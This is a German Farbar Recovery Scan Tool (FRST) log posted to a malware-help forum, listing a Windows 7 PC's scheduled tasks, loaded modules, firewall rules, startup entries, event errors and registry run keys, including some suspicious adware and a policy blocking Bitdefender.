(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2015-06-02 09:01 - 2015-08-26 11:33 - 01205136 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe 2013-11-03 19:09 - 2013-10-23 10:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2014-01-15 20:58 - 2014-01-15 21:16 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe 2015-09-19 11:34 - 2015-09-19 11:34 - 01610240 _____ () C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs 2013-09-13 19:51 - 2013-09-13 19:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2013-09-13 19:51 - 2013-09-13 19:51 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) AlternateDataStreams: C:\ProgramData\TEMP:373E1720 AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_12.1_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_13.1.2_x64_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\torbrowser-install-3.5.2_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\HiJackThis204.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\jetboost-setup-2.0.0.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupCasino_aad73b_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupPoker_5fabb7.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\TitanBSetup_5c0cd5.exe:BDU AlternateDataStreams: C:\Users\Tabea Studium\Downloads\Shockwave_Installer_Slim.exe:BDU ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\webcompanion.com -> hxxp://webcompanion.com ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Control Panel\Desktop\\Wallpaper -> HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\eLoot\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\Tabea Studium\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.2.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk => C:\Windows\pss\MyPC Backup.lnk.Startup MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" MSCONFIG\startupreg: Bdagent => "C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe" MSCONFIG\startupreg: Bitdefender-Geldb�rse => MSCONFIG\startupreg: Bitdefender-Geldb�rse-Anwendungs-Agent => MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min MSCONFIG\startupreg: FreeAC => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe -autorun MSCONFIG\startupreg: GoogleChromeAutoLaunch_9CD6D292798361639A68D2D1D9501714 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window MSCONFIG\startupreg: icq => C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe -CU MSCONFIG\startupreg: InstallerLauncher => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\Installer.exe" MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe" MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe MSCONFIG\startupreg: Optimizer Pro => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe MSCONFIG\startupreg: Sony PC Companion => "C:\Program Files (x86)\Sony\Sony PC Companion\PCCompanion.exe" /Background MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{F1E8D03D-FFA2-42DD-A766-22ABE0AD0436}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{A0A07BA7-2135-482B-8CF0-7D59DA237E7B}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe FirewallRules: [{15629829-3DD3-4A81-B20D-4255F55023B9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{51D8DA04-F385-4088-8779-22A2C6969D59}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{1CD2F4D1-8114-4FBA-9D7E-4BFC8959B015}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{1B40452A-2002-47A8-B02E-49C07A677A04}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{B6489A7B-4235-4D96-99A9-EEDD6A2FE8BD}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe FirewallRules: [{720D02FF-52F6-4154-A621-5AB2A3DB03A3}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{C7AF308F-8BD1-41D4-A681-37A1C88C993A}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{10736636-FB53-42C9-A3F4-529BAFEF521E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{750C88E5-8449-4ED6-87F6-6F9A40C73F22}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{72A3B8D8-259B-478D-8EA1-E3F979D8CA18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{81B1EC25-555A-4F2F-9395-9FD97F51323B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{2C423E45-FD79-468B-B116-1FC2C2477842}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{DA81D9C0-E7D2-4027-B0A5-A8A45C00F77D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{521249EF-E21D-4C4E-8C32-FDD3F208B733}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{89E0E88B-D4E4-491D-A414-02FCD1F3D197}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{1C8A9419-FD22-4DAA-A57C-F115A281A979}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{8B608DD6-21BB-4A2E-8800-E7106712C6F0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{A1CF8413-A121-4594-8D4F-822D997AD1F7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{78D1B940-9035-4A6C-BF79-C39436D455B2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{9FD597A8-5DF3-405B-BF40-DAD0B4A3D331}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{33EBB500-8307-46EF-8E6E-4044649E5550}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{B2E37F34-F81A-4758-AE8C-6350303ED76A}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{F8A57BC5-5370-4537-AD73-18A47D9490BA}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{396CE83B-463E-4ABD-9DDF-3AAF00CF8FC2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{55CF9D3A-CEA1-4EE1-9710-588133F87671}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{257241F5-DB72-4BCC-966A-EB960C45A132}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{B075E0A7-AA0A-476A-8E74-51E6DE493C7A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{FECE91C7-34A5-4011-ACE9-0C45BCC3E776}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{4F4A4AF0-A162-4CDE-A55E-56F506AF9332}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{E2340314-D830-445B-ACFE-84B2490E2D2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{6E566919-5331-43A5-85E4-7B72D59CEE97}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{C86938D2-4623-4413-8927-C89AAE8215B2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{CAB95473-AE42-4A88-A6CD-2019753F6D1F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8A3B2F36-312E-4CF7-A10A-E8D05CB2FD24}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{707E083B-17A4-43B5-A25F-F911B7A2478B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{D466720C-AE72-408E-81DB-EF107F94C734}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{875B4892-FDD1-4915-BE18-3D04DCB57C60}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{2BCB0DB0-2EB2-4F78-8EEE-6E29EE0C7CFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{FCF89AD8-A839-4426-A4C5-771A89F905E3}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{9B5F71A5-ACE5-483E-8E24-4F704CB2BD56}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [{165D76C1-CFCF-4A31-95F2-57AD4831602B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [TCP Query User{11D72B15-04AE-4224-98D0-4E863D33585C}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [UDP Query User{1E3DB40B-BE9E-42A4-8A07-6F1460C15F3A}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [TCP Query User{99D93149-D86B-4104-94D4-75AB15AAEBB6}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [UDP Query User{32F3CAD3-4F49-4157-A353-BC565EEB431F}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [{1AFD0420-A3E2-4D4C-89BF-9175F1E06A0C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{48969429-133A-4C3A-96AA-517EE6CD1645}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe FirewallRules: [{FBEF1CE7-BE0B-4061-BD5F-A3965CC65AD6}] => (Allow) D:\Verkauf\powerpoint\Office15\outlook.exe ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (09/23/2015 04:42:41 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Programm firefox.exe, Version 40.0.3.5716 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen. Prozess-ID: 15dc Startzeit: 01d0f4e91e3afce0 Endzeit: 175 Anwendungspfad: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Berichts-ID: bfe47101-619c-11e5-bda6-001e8c09ea3d Error: (09/22/2015 07:13:53 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 15382 Error: (09/22/2015 07:13:53 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 15382 Error: (09/22/2015 07:13:53 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (09/22/2015 07:13:52 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 14383 Error: (09/22/2015 07:13:52 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 14383 Error: (09/22/2015 07:13:52 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (09/22/2015 07:13:51 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 13385 Error: (09/22/2015 07:13:51 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 13385 Error: (09/22/2015 07:13:51 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Systemfehler: ============= CodeIntegrity: =================================== Date: 2015-09-21 18:26:06.410 Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert. Date: 2015-09-21 18:26:06.394 Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert. Date: 2015-09-09 00:48:00.156 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.111 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.054 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.010 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.933 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.879 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.840 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.785 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. ==================== Speicherinformationen =========================== Prozessor: AMD Athlon(tm) 64 X2 Dual Core Processor 4600+ Prozentuale Nutzung des RAM: 47% Installierter physikalischer RAM: 4094.49 MB Verfügbarer physikalischer RAM: 2167.05 MB Summe virtueller Speicher: 8187.13 MB Verfügbarer virtueller Speicher: 5641.07 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:186.31 GB) (Free:70.02 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)] Drive d: (Data) (Fixed) (Total:698.63 GB) (Free:483.76 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 186.3 GB) (Disk ID: 500D500D) Partition 1: (Active) - (Size=186.3 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows XP) (Size: 698.6 GB) (Disk ID: 7F4B721C) Partition 1: (Not Active) - (Size=698.6 GB) - (Type=07 NTFS) ==================== Ende von Addition.txt ============================ Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:23-09-2015 durchgeführt von Kenny G (Administrator) auf KENNYG-PC (23-09-2015 04:59:45) Gestartet von C:\Users\Kenny G\Downloads Geladene Profile: Kenny G & UpdatusUser & (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium) Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 8 (Standard-Browser: FF) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe () C:\Windows\SysWOW64\PnkBstrA.exe () C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs (CyberGhost S.R.L) C:\Program Files\CyberGhost 5\Service.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe (Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Malwarebytes Corporation) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbam.exe (Microsoft Corporation) C:\Windows\System32\prevhost.exe ==================== Registry (Nicht auf der Ausnahmeliste) =========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-10-18] (NVIDIA Corporation) HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3775912 2015-08-24] (AVG Technologies CZ, s.r.o.) HKLM Group Policy restriction on software: C:\Program Files\BitDefender <====== ACHTUNG HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd) HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_13_0_0_214_Plugin.exe -update plugin HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {56afb9cd-5a71-11e3-957d-001e8c09ea3d} - F:\iStudio.exe HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {56afb9cd-5a71-11e3-957d-001e8c09ea3d} - F:\iStudio.exe SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation) SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation) ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) 